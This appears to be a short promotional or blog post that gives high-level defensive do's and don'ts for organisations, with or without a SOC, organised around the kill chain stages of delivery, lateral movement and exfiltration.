How to defend with(out) a SOC as first defense?
Do you want to understand the modern cyber threats and the most commonly used attack surfaces behind any malware/cyber-attack?
Don’ts:
1.) Don’t give everything easily to the attacker, make it harder for him to get. (Control Measures in the network)
2.) Don’t enable legitimate vulnerable application if not in use, attackers always use legit applications in the network. (Abuse of LOLBins)
3.) Don’t think that attackers create an only a single piece of code, they always rely on attack stages with more commands and functionalities. (Cyber Kill Chains)
Do’s:
1.) Defending against the malware delivery – Entering your organization network
2.) If malware delivered successful, how you going to defend its lateral movement and persistence? – Moving inside your organization network.
3.) If the attacker accomplished all his activities, his final stage will be exfiltrated or breach – Leaving your organization Network.